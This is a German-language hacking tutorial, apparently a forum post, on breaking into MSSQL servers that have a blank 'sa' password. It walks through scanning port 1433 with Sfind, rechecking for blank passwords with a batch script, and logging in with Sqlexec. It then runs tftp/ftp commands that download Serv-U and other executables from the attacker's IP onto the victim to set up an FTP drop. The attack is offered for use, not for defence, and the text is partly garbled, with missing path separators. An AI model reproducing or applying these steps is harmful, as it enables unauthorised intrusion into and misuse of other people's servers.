Sie sind auf Seite 1von 2

Contributed by Snake on Sunday, 16.March.

@ 15:52:47 CET
][ MSSQL TUTOR ][
------------------------------
Ihr Braucht: SQl Scanns *gg
Serv-u
Sqlexec
TFTP
1.Ihr konfigiert Servu und lasst es auf nen 4 stelligen Port laufen z.B 3275
2. so schaut ein Sql Scann Result aus :202.5.194.45 Found Mssql account: sa/[Nul
l]
sa ist der Username /[Null] << das bedeutet das der Server kein pw hat...
3.so gibt ihr das in Sqlexec ein...bei user sa bei pw nichts
3.ihr sucht euch ein dir aus fr Serv-u aus
4.Ihr startet tftp auf euhren Pc...
5.bei Sql werden die normalen Msdos befehle genutzt
6.c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.ini c:hier der Pfadserv-u.
ini << mit diesen Befehl upt ihr Serv-u.ini
7.c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.exe c:hier der Pfadserv-u.
exe << befehl fr exe
8.Hier das DirServ-u.exe << so startet ihr Serv-u.exe
9.dan ERhngt sich das proggy und der stro ist fertig
hier erstmal das TUT:
1. Das Scannen bzw. Rechecken
Also, als ertes scannst du nach SQL Servern, das geht z.B mit dem prog "Sfind.ex
e". der port eines SQL Servers ist 1433, also auch danach scannen
Wenn du fertig mit dem scannen bist und einige Ip's dabei rauskamen, musst du di
ese noch mal rechecken um das Password zu bekommen.
Dies geht so:
Du kopierst das prog. "SQLLHF.exe" auf c: (auf deiner Festplatte) als nchstes kop
ierst du das prog. "Check_1.bat" auf c:
Auf c: muss sich ebenfalls die Sfind.txt befinden, wo sich die gescannten Ip's d
rin befinden !
Jetzt ffnest du die MS-Dos Eingabeaufforderung und startest das Prog. "Check_1.ba
t".
jetzt werden die scanns "gepingt", das geht alles automatisch.
Nach ca. 5 Minuten ist er fetig damit und er zeigt nochmal alle Ip's an, die er
"gepingt" hat.
Wenn sowas dahinter steht: "Checking 194.xxx.xx.xx ::: Password not guessed" kan
nst du den Server schon mal vergessen, geht also nicht !!!
Wenn aber hinter der IP das hier steht: "Checking 194.xxx.xx.xx ::: Password is
blank!! <---- WARNING!"
GEHT dieser Server, kann also gehaxxt werden
2. Das Connecten bzw. hacken
Du ffnest das Tool "Sqlexec.exe" und gibst oben die IP ein. Als User muss immer "
Sa" stehen.
Und bei dem Pass gibst du das ein, was du beim "rechecken" bekommen hast, also w
enn du diese Meldung bekommen hast : "Checking 194.xxx.xx.xx ::: Password is bla
nk!! <---- WARNING!"
Musst du kein Pass eingeben. Blank=kein Pass
Jetzt gibst du unten den Befehl "dir c:" ein.
Schon siehst du die Festplatte des SQL Servers !!!
um die Serv-U Dateien per tftp zu holen einfach diesen Befehl benuten:
Deine IP Dateien beispiel
tftp.exe -i 80.143.98.142 GET Servudaemon.exe c:server.exe
tftp.exe -i 80.143.98.142 GET TzoLibr.dll c: TzoLibr.dll
tftp.exe -i 80.143.98.142 GET winmgnt.exe c:winmgnt.exe
tftp.exe -i 80.143.104.6 GET httpodbc.dll c:httpodbc.dll
tftp.exe -i 80.143.104.6 GET ServUDaemon.ini c:ServUDaemon.ini
tftp.exe -i 80.143.104.6 GET speed.exe c:windowssystem32speed.exe ?
tftp.exe -i 80.143.104.6 GET 1.txt c:windowssystem321.txt )____ ????
tftp.exe -i 80.143.104.6 GET 2.txt c:windowssystem322.txt )